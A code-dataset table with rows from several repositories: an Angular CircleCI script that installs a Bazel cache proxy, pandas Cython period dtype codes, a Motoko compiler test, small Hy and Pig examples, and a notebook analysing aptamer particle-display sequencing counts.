content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
#!/bin/sh
# Install bazel remote cache proxy
# This is temporary until the feature is no longer experimental on CircleCI.
# See remote cache documentation in /docs/BAZEL.md
set -u -e
readonly DOWNLOAD_URL="https://5-116431813-gh.circle-artifacts.com/0/pkg/bazel-remote-proxy-$(uname -s)_$(uname -m)"
curl --fail -o ~/bazel-remote-proxy "$DOWNLOAD_URL"
chmod +x ~/bazel-remote-proxy
| Shell | 4 | coreyscherbing/angular | .circleci/setup_cache.sh | [
"MIT"
] |
cdef dict attrname_to_abbrevs
cdef enum c_FreqGroup:
# Mirrors FreqGroup in the .pxy file
FR_ANN = 1000
FR_QTR = 2000
FR_MTH = 3000
FR_WK = 4000
FR_BUS = 5000
FR_DAY = 6000
FR_HR = 7000
FR_MIN = 8000
FR_SEC = 9000
FR_MS = 10000
FR_US = 11000
FR_NS = 12000
FR_UND = -10000 # undefined
cdef enum PeriodDtypeCode:
# Annual freqs with various fiscal year ends.
# eg, 2005 for A_FEB runs Mar 1, 2004 to Feb 28, 2005
A = 1000 # Default alias
A_DEC = 1000 # Annual - December year end
A_JAN = 1001 # Annual - January year end
A_FEB = 1002 # Annual - February year end
A_MAR = 1003 # Annual - March year end
A_APR = 1004 # Annual - April year end
A_MAY = 1005 # Annual - May year end
A_JUN = 1006 # Annual - June year end
A_JUL = 1007 # Annual - July year end
A_AUG = 1008 # Annual - August year end
A_SEP = 1009 # Annual - September year end
A_OCT = 1010 # Annual - October year end
A_NOV = 1011 # Annual - November year end
# Quarterly frequencies with various fiscal year ends.
# eg, Q42005 for Q_OCT runs Aug 1, 2005 to Oct 31, 2005
Q_DEC = 2000 # Quarterly - December year end
Q_JAN = 2001 # Quarterly - January year end
Q_FEB = 2002 # Quarterly - February year end
Q_MAR = 2003 # Quarterly - March year end
Q_APR = 2004 # Quarterly - April year end
Q_MAY = 2005 # Quarterly - May year end
Q_JUN = 2006 # Quarterly - June year end
Q_JUL = 2007 # Quarterly - July year end
Q_AUG = 2008 # Quarterly - August year end
Q_SEP = 2009 # Quarterly - September year end
Q_OCT = 2010 # Quarterly - October year end
Q_NOV = 2011 # Quarterly - November year end
M = 3000 # Monthly
W_SUN = 4000 # Weekly - Sunday end of week
W_MON = 4001 # Weekly - Monday end of week
W_TUE = 4002 # Weekly - Tuesday end of week
W_WED = 4003 # Weekly - Wednesday end of week
W_THU = 4004 # Weekly - Thursday end of week
W_FRI = 4005 # Weekly - Friday end of week
W_SAT = 4006 # Weekly - Saturday end of week
B = 5000 # Business days
D = 6000 # Daily
H = 7000 # Hourly
T = 8000 # Minutely
S = 9000 # Secondly
L = 10000 # Millisecondly
U = 11000 # Microsecondly
N = 12000 # Nanosecondly
UNDEFINED = -10_000
cdef class PeriodDtypeBase:
cdef readonly:
PeriodDtypeCode _dtype_code
| Cython | 4 | CJL89/pandas | pandas/_libs/tslibs/dtypes.pxd | [
"BSD-3-Clause"
] |
// top-level actor objects are supported
actor Counter {
flexible shared func bad_private_shared() { }; // unsupported private shared
public func ok_actorarg(a:actor{}) : async () {};
public func ok_functionarg(f:shared()->async ()) : async () {};
public func ok_oneway(){}; // supported oneway
public func ok() : async () {};
public func ok_explicit() : async () = async {};
public func ok_call() : async () {
ignore (ok()); // supported intercanister messaging
};
public func ok_await_call() : async () {
await (ok()); // supported intercanister messaging
};
public func ok_await() : async () {
let t : async () = loop {};
await t; // supported general await
};
public func ok_async() : async () {
let a = async { 1; }; // supported async
};
}
;
shared func bad_shared() { }; // unsupported non actor-member
do {
// shared function types are sharable
type wellformed_1 = shared (shared () -> ()) -> async ();
};
do {
// actors are shareable
type wellformed_2 = shared (actor {}) -> async ();
};
do {
actor class BadActorClass () { }; // no actor classes
};
do {
actor class BadActorClass (x : Int) { }; // no actor classes
};
do {
let bad_non_top_actor : actor {} = if true actor {} else actor {};
};
do {
let bad_nested_actor = do { let _ = actor {}; ()};
};
actor BadSecondActor { };
// async functions not supported (inference mode)
func implicit_async() : async () { };
// anonymous shared functions not supported (inference and checking mode)
let _ = shared func() : async () { };
(shared func() : async () { }) : shared () -> async ();
| Modelica | 4 | olaszakos/motoko | test/run-drun/unsupported.mo | [
"Apache-2.0"
] |
(import hyper json)
(defn http2bin [path]
(with [[conn (hyper.HTTPConnection "http2bin.org")]]
(.request conn "GET" path)
(-> (.get_response conn) (.read) (json.loads))))
(-> (http2bin "/ip") (get "origin") (print))
| Hy | 3 | dhdavvie/hyper | examples/ip.hy | [
"MIT"
] |
mail = load '${in}' using PigStorage();
store mail into '${out}' using PigStorage(); | PigLatin | 2 | alexvanboxel/luigiext-gcloud | examples/queries/pig_foreach_example.pig | [
"Apache-2.0"
] |
import { element, by } from 'protractor';
import { AppPage } from './app.po';
describe('providers App', () => {
let page: AppPage;
beforeEach(async () => {
page = new AppPage();
await page.navigateTo();
});
it('should display header that says Users list', async () => {
expect(await page.getTitleText()).toEqual('Users list');
});
it('shows a list of customers', async () => {
const items = element.all(by.css('app-root li'));
expect(await items.count()).toBe(10);
expect(await items.get(0).getText()).toBe('1 Maria');
expect(await items.get(9).getText()).toBe('10 Seth');
});
});
| TypeScript | 4 | John-Cassidy/angular | aio/content/examples/providers/e2e/src/app.e2e-spec.ts | [
"MIT"
] |
{
"cells": [
{
"metadata": {
"id": "DhWmZgAVwDGu",
"colab_type": "text"
},
"cell_type": "markdown",
"source": [
"Copyright 2021 Google LLC\n",
"\n",
"Licensed under the Apache License, Version 2.0 (the \"License\");\n",
"you may not use this file except in compliance with the License.\n",
"You may obtain a copy of the License at\n",
"\n",
" https://www.apache.org/licenses/LICENSE-2.0\n",
"\n",
"Unless required by applicable law or agreed to in writing, software\n",
"distributed under the License is distributed on an \"AS IS\" BASIS,\n",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n",
"See the License for the specific language governing permissions and\n",
"limitations under the License."
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "-hbchNubOTea"
},
"source": [
"# Overview\n",
"\n",
"This notebook summarizes the numbers of aptamers that appear to be enriched in positive pools for particular particule display experiments. These values are turned into venn diagrams and pie charts in Figure 2. \n",
"\n",
"The inputs are csvs, where each row is an aptamer and columns indicate the sequencing counts within each particle display subexperiment.\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"cellView": "both",
"id": "e3ZmaXPJntva"
},
"outputs": [],
"source": [
"import matplotlib.pyplot as plt\n",
"import seaborn as sns\n",
"import numpy as np\n",
"import pandas as pd "
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "iwjz9suGO6mA"
},
"source": [
"# Parameters used in Manuscript\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "0m_fyH1FO9Ce"
},
"outputs": [],
"source": [
"# Required coverage level for analysis. This is in units of number of apatamer \n",
"# particles (beads). This is used to minimize potential contamination. \n",
"# For example, a tolerated bead fraction of 0.2 means that if, based on read \n",
"# depth and number of beads, there are 100 reads expected per bead, then \n",
"# sequences with fewer than 20 reads would be excluded from analysis.\n",
"TOLERATED_BEAD_FRAC = 0.2 \n",
"\n",
"# Ratio cutoff between positive and negative pools to count as being real.\n",
"# The ratio is calculated normalized by read depth, so if the ratio is 0.5, \n",
"# then positive sequences are expected to have equal read depth (or more) in \n",
"# the positive pool as the negative pool. So, as a toy example, if the \n",
"# positive pool had 100 reads total and the negative pool had 200 reads total,\n",
"# then a sequence with 5 reads in the positive pool and 10 reads in the \n",
"# negative pool would have a ratio of 0.5.\n",
"POS_NEG_RATIO_CUTOFF = 0.5\n",
"\n",
"# Minimum required reads (when 0 it uses only the above filters)\n",
"MIN_READ_THRESH = 0"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "SW2pi3B0hvTW"
},
"source": [
"# Load in data"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "jTsPQUpjAVjP"
},
"source": [
"## Load in experimental conditions for Particle Display experiments\n",
"\n",
"The mlpd_params_df contains the experimental information for MLPD.\n",
"\n",
"Parameters are:\n",
"* apt_collected: The number of aptamer bead particles collected during the FACs experiment of particle display.\n",
"* apt_screened: The number of aptamer bead particles screened in order to get the apt_collected beads. \n",
"* seq_input: The estimated number of unique sequences in the input sequence library during bead construction."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 138
},
"executionInfo": {
"elapsed": 356,
"status": "ok",
"timestamp": 1603828302117,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "jbCpKfz04mxN",
"outputId": "43123110-e7e6-48db-cf92-0fa4c79f1913"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003eapt_screened\u003c/th\u003e\n",
" \u003cth\u003eapt_collected\u003c/th\u003e\n",
" \u003cth\u003eseq_input\u003c/th\u003e\n",
" \u003cth\u003econdition\u003c/th\u003e\n",
" \u003cth\u003econdition_flag\u003c/th\u003e\n",
" \u003cth\u003estringency\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e0\u003c/th\u003e\n",
" \u003ctd\u003e2400000.0\u003c/td\u003e\n",
" \u003ctd\u003e35000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_high_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_high_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eHigh\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e1\u003c/th\u003e\n",
" \u003ctd\u003e2400000.0\u003c/td\u003e\n",
" \u003ctd\u003e85000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_medium_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_medium_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eMedium\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e2\u003c/th\u003e\n",
" \u003ctd\u003e1240000.0\u003c/td\u003e\n",
" \u003ctd\u003e80000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_low_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_low_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eLow\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" apt_screened apt_collected ... condition_flag stringency\n",
"0 2400000.0 35000.0 ... round2_high_no_serum_flag High\n",
"1 2400000.0 85000.0 ... round2_medium_no_serum_flag Medium\n",
"2 1240000.0 80000.0 ... round2_low_no_serum_flag Low\n",
"\n",
"[3 rows x 6 columns]"
]
},
"execution_count": 3,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Original PD Data Parameters\n",
"\n",
"# Since these are small I'm going to embed in the colab.\n",
"apt_screened_list = [ 2.4*10**6, 2.4*10**6, 1.24*10**6]\n",
"apt_collected_list = [3.5 * 10**4, 8.5 * 10**4, 8 * 10**4]\n",
"seq_input = [10**5] * 3\n",
"conditions = ['round2_high_no_serum_positive', \n",
" 'round2_medium_no_serum_positive',\n",
" 'round2_low_no_serum_positive']\n",
"flags = ['round2_high_no_serum_flag', 'round2_medium_no_serum_flag', \n",
" 'round2_low_no_serum_flag']\n",
"stringency = ['High', 'Medium', 'Low']\n",
"\n",
"pd_param_df = pd.DataFrame.from_dict({'apt_screened': apt_screened_list,\n",
" 'apt_collected': apt_collected_list,\n",
" 'seq_input': seq_input,\n",
" 'condition': conditions,\n",
" 'condition_flag': flags,\n",
" 'stringency': stringency})\n",
"\n",
"pd_param_df"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 168
},
"executionInfo": {
"elapsed": 311,
"status": "ok",
"timestamp": 1603828302739,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "HnXcw8Pg56Rw",
"outputId": "66916855-c76f-438d-a1aa-f14c1d2623f7"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003eapt_screened\u003c/th\u003e\n",
" \u003cth\u003eapt_collected\u003c/th\u003e\n",
" \u003cth\u003eseq_input\u003c/th\u003e\n",
" \u003cth\u003econdition\u003c/th\u003e\n",
" \u003cth\u003econdition_flag\u003c/th\u003e\n",
" \u003cth\u003estringency\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e0\u003c/th\u003e\n",
" \u003ctd\u003e3283890.016\u003c/td\u003e\n",
" \u003ctd\u003e12204\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_very_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_very_flag\u003c/td\u003e\n",
" \u003ctd\u003eVery High\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e1\u003c/th\u003e\n",
" \u003ctd\u003e6628573.952\u003c/td\u003e\n",
" \u003ctd\u003e50353\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_high_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_high_flag\u003c/td\u003e\n",
" \u003ctd\u003eHigh\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e2\u003c/th\u003e\n",
" \u003ctd\u003e5801469.696\u003c/td\u003e\n",
" \u003ctd\u003e153845\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_medium_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_medium_flag\u003c/td\u003e\n",
" \u003ctd\u003eMedium\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e3\u003c/th\u003e\n",
" \u003ctd\u003e3508412.512\u003c/td\u003e\n",
" \u003ctd\u003e201255\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_low_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_low_flag\u003c/td\u003e\n",
" \u003ctd\u003eLow\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" apt_screened apt_collected ... condition_flag stringency\n",
"0 3283890.016 12204 ... round1_very_flag Very High\n",
"1 6628573.952 50353 ... round1_high_flag High\n",
"2 5801469.696 153845 ... round1_medium_flag Medium\n",
"3 3508412.512 201255 ... round1_low_flag Low\n",
"\n",
"[4 rows x 6 columns]"
]
},
"execution_count": 4,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title MLPD Data Parameters\n",
"apt_screened_list = [ 3283890.016, 6628573.952, 5801469.696, 3508412.512]\n",
"apt_collected_list = [12204, 50353, 153845, 201255]\n",
"seq_input = [200000] * 4\n",
"conditions = ['round1_very_positive', \n",
" 'round1_high_positive',\n",
" 'round1_medium_positive',\n",
" 'round1_low_positive']\n",
"flags = ['round1_very_flag', 'round1_high_flag', 'round1_medium_flag', \n",
" 'round1_low_flag']\n",
"stringency = ['Very High', 'High', 'Medium', 'Low']\n",
"mlpd_param_df = pd.DataFrame.from_dict({'apt_screened': apt_screened_list,\n",
" 'apt_collected': apt_collected_list,\n",
" 'seq_input': seq_input,\n",
" 'condition': conditions,\n",
" 'condition_flag': flags,\n",
" 'stringency': stringency})\n",
"\n",
"\n",
"mlpd_param_df"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "vRpbBLF4tCLW"
},
"source": [
"## Load CSVs"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 141
},
"executionInfo": {
"elapsed": 560997,
"status": "ok",
"timestamp": 1603828878626,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "jwACDCh9PMPl",
"outputId": "6b18aa03-545b-4ef4-eff3-4a9d2b34ec1c"
},
"outputs": [
{
"data": {
"text/html": [
"\n",
" \u003cinput type=\"file\" id=\"files-20b90a5d-83e9-4246-b161-06a94095f9bc\" name=\"files[]\" multiple disabled\n",
" style=\"border:none\" /\u003e\n",
" \u003coutput id=\"result-20b90a5d-83e9-4246-b161-06a94095f9bc\"\u003e\n",
" Upload widget is only available when the cell has been executed in the\n",
" current browser session. Please rerun this cell to enable.\n",
" \u003c/output\u003e\n"
],
"text/plain": [
"\u003cIPython.core.display.HTML at 0x7f4f50536860\u003e"
]
},
"metadata": {
"tags": []
},
"output_type": "display_data"
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"Saving mlpd_input_data_manuscript.csv to mlpd_input_data_manuscript.csv\n",
"Saving pd_clustered_input_data_manuscript.csv to pd_clustered_input_data_manuscript.csv\n",
"User uploaded file \"mlpd_input_data_manuscript.csv\" with length 24198752 bytes\n",
"User uploaded file \"pd_clustered_input_data_manuscript.csv\" with length 64368063 bytes\n"
]
}
],
"source": [
"# PD and MLPD sequencing counts across experiments\n",
"# Upload pd_clustered_input_data_manuscript.csv and mlpd_input_data_manuscript.csv\n",
"from google.colab import files\n",
"\n",
"uploaded = files.upload()\n",
"\n",
"for fn in uploaded.keys():\n",
" print('User uploaded file \"{name}\" with length {length} bytes'.format(\n",
" name=fn, length=len(uploaded[fn])))"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "iw2osP0aj5i1"
},
"outputs": [],
"source": [
"# Load PD Data\n",
"with open('pd_clustered_input_data_manuscript.csv') as f:\n",
" pd_input_df = pd.read_csv(f)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "Zl1AGYd8O6MT"
},
"outputs": [],
"source": [
"# Load MLPD data\n",
"with open('mlpd_input_data_manuscript.csv') as f:\n",
" mlpd_input_df = pd.read_csv(f)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "rT_gewBxKvxE"
},
"source": [
"# Helper functions\n",
"\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "JbUfkYM0m075"
},
"outputs": [],
"source": [
"def generate_cutoffs_via_PD_stats(df, col, apt_screened, apt_collected, seq_input,\n",
" tolerated_bead_frac, min_read_thresh):\n",
" \"\"\"Use the experimental parameters to determine sequences passing thresholds.\n",
"\n",
" Args:\n",
" df: Pandas dataframe with experiment results. Must have columns named \n",
" after the col function parameter, containing the read count, and a\n",
" column 'sequence'.\n",
" col: The string name of the column in the experiment dataframe with the \n",
" read count.\n",
" apt_screened: The integer number of aptamers screened, from the experiment \n",
" parameters.\n",
" apt_collected: The integer number of aptamers collected, from the experiment\n",
" parameters.\n",
" seq_input: The integer number of unique sequences in the sequence library \n",
" used to construct the aptamer particles.\n",
" tolerated_bead_frac: The float tolerated bead fraction threshold. In other\n",
" words, the sequencing depth required to keep a sequence, in units of\n",
" fractions of a bead based on the average expected read depth per bead. \n",
" min_read_threshold: The integer minimum number of reads that a sequence\n",
" must have in order not to be filtered.\n",
"\n",
" Returns:\n",
" Pandas series of the sequences from the dataframe that pass filter.\n",
" \"\"\"\n",
"\n",
" expected_bead_coverage = apt_screened / seq_input\n",
" tolerated_bead_coverage = expected_bead_coverage * tolerated_bead_frac\n",
" bead_full_min_sequence_coverage = (1. / apt_collected) * tolerated_bead_coverage\n",
" col_sum = df[col].sum()\n",
" # Look at sequenced counts calculated observed fraction of pool and raw count.\n",
" seqs = df[((df[col]/col_sum) \u003e bead_full_min_sequence_coverage) \u0026 # Pool frac.\n",
" (df[col] \u003e min_read_thresh) # Raw count\n",
" ].sequence\n",
" return seqs\n",
"\n",
"\n",
"def generate_pos_neg_normalized_ratio(df, col_prefix):\n",
" \"\"\"Adds fraction columns to the dataframe with the calculated pos/neg ratio.\n",
"\n",
" Args:\n",
" df: Pandas dataframe, expected to have columns [col_prefix]_positive and\n",
" [col_prefix]_negative contain read counts for the positive and negative\n",
" selection conditions, respectively.\n",
" col_prefix: String prefix of the columns to use to calculate the ratio. \n",
" For example 'round1_very_positive'.\n",
" \n",
" Returns:\n",
" The original dataframe with three new columns:\n",
" [col_prefix]_positive_frac contains the fraction of the total positive \n",
" pool that is this sequence.\n",
" [col_prefix]_negative_frac contains the fraction of the total negative\n",
" pool that is this sequence.\n",
" [col_prefix]_pos_neg_ratio: The read-depth normalized fraction of the \n",
" sequence that ended in the positive pool.\n",
" \"\"\"\n",
" col_pos = col_prefix + '_' + 'positive'\n",
" col_neg = col_prefix + '_' + 'negative'\n",
" df[col_pos + '_frac'] = df[col_pos] / df[col_pos].sum()\n",
" df[col_neg + '_frac'] = df[col_neg] / df[col_neg].sum()\n",
" df[col_prefix + '_pos_neg_ratio'] = df[col_pos + '_frac'] / (\n",
" df[col_pos + '_frac'] + df[col_neg + '_frac'])\n",
" return df\n",
"\n",
"\n",
"def build_seq_sets_from_df (input_param_df, input_df, tolerated_bead_frac, \n",
" pos_neg_ratio, min_read_thresh):\n",
" \"\"\"Sets flags for sequences based on whether they clear stringencies.\n",
"\n",
" This function adds a column 'seq_set' to the input_param_df (one row per\n",
" stringency level of a particle display experiment) containing all the \n",
" sequences in the experiment that passed that stringency level in the \n",
" experiment.\n",
"\n",
" Args:\n",
" input_param_df: Pandas dataframe with experimental parameters. Expected\n",
" to have one row per stringency level in the experiment and \n",
" columns 'apt_screened', 'apt_collected', 'seq_input', 'condition', and\n",
" 'condition_flag'.\n",
" input_df: Pandas dataframe with the experimental results (counts per \n",
" sequence) for the experiment covered in the input_param_df. Expected\n",
" to have a [col_prefix]_pos_neg_ratio column for each row of the\n",
" input_param_df (i.e. each stringency level).\n",
" tolerated_bead_frac: Float representing the minimum sequence depth, in\n",
" units of expected beads, for a sequence to be used in analysis.\n",
" pos_neg_ratio: The threshold for the pos_neg_ratio column for a sequence\n",
" to be used in the analysis.\n",
" min_read_thresh: The integer minimum number of reads for a sequence to\n",
" be used in the analysis (not normalized, a straight count.)\n",
"\n",
" Returns:\n",
" Nothing.\n",
"\n",
" \"\"\"\n",
" for _, row in input_param_df.iterrows():\n",
" \n",
" # Get parameters to calculate bead fraction.\n",
" apt_screened = row['apt_screened']\n",
" apt_collected = row['apt_collected']\n",
" seq_input = row['seq_input']\n",
" condition = row['condition']\n",
" flag = row['condition_flag']\n",
" \n",
" # Get sequences above tolerated_bead_frac in positive pool.\n",
" tolerated_bead_frac_seqs = generate_cutoffs_via_PD_stats(\n",
" input_df, condition, apt_screened, apt_collected, seq_input, \n",
" tolerated_bead_frac, min_read_thresh)\n",
" \n",
" # Intersect with seqs \u003e normalized positive sequencing count ratio.\n",
" condition_pre = condition.split('_positive')[0]\n",
" ratio_col = '%s_pos_neg_ratio' % (condition_pre)\n",
" pos_frac_seqs = input_df[input_df[ratio_col] \u003e pos_neg_ratio].sequence\n",
" seqs = set(tolerated_bead_frac_seqs) \u0026 set(pos_frac_seqs)\n",
" input_df[flag] = input_df.sequence.isin(set(seqs))"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "VQJaU2bzJh0V"
},
"source": [
"# Data Analysis"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "ftmm7zPcD_fK"
},
"outputs": [],
"source": [
"#@title Add positive_frac / (positive_frac + negative_frac) col to df\n",
"\n",
"for col_prefix in ['round1_very', 'round1_high', 'round1_medium', 'round1_low']:\n",
" mlpd_input_df = generate_pos_neg_normalized_ratio(mlpd_input_df, col_prefix)\n",
" \n",
"\n",
"for col_prefix in ['round2_high_no_serum', 'round2_medium_no_serum', 'round2_low_no_serum']:\n",
" pd_input_df = generate_pos_neg_normalized_ratio(pd_input_df, col_prefix)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "hR2FvzJoyYFl"
},
"outputs": [],
"source": [
"#@title Measure consistency of particle display data when increasing stringency thresholds within each experimental set (i.e PD and MLPD)\n",
"\n",
"build_seq_sets_from_df(pd_param_df, pd_input_df, TOLERATED_BEAD_FRAC, \n",
" POS_NEG_RATIO_CUTOFF, MIN_READ_THRESH)\n",
"\n",
"build_seq_sets_from_df(mlpd_param_df, mlpd_input_df, TOLERATED_BEAD_FRAC, \n",
" POS_NEG_RATIO_CUTOFF, MIN_READ_THRESH)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "5HQNo-kJiJIj"
},
"source": [
"# Generate Figure Data\n",
"Here, we generate the raw data used to build Venn diagrams. The final figures were render in Figma."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 318
},
"executionInfo": {
"elapsed": 605,
"status": "ok",
"timestamp": 1603828883222,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "NpkpSTK-gJxB",
"outputId": "f30608df-5e01-465a-e13f-f3287c0c06a1"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003esequence\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eround2_low_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003eround2_medium_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003eround2_high_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e908587\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e44\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e27\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e3\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e687\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e6\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e702\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e385\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" sequence\n",
"round2_low_no_serum_flag round2_medium_no_serum_flag round2_high_no_serum_flag \n",
"False False False 908587\n",
" True 44\n",
" True False 27\n",
" True 3\n",
"True False False 687\n",
" True 6\n",
" True False 702\n",
" True 385"
]
},
"execution_count": 13,
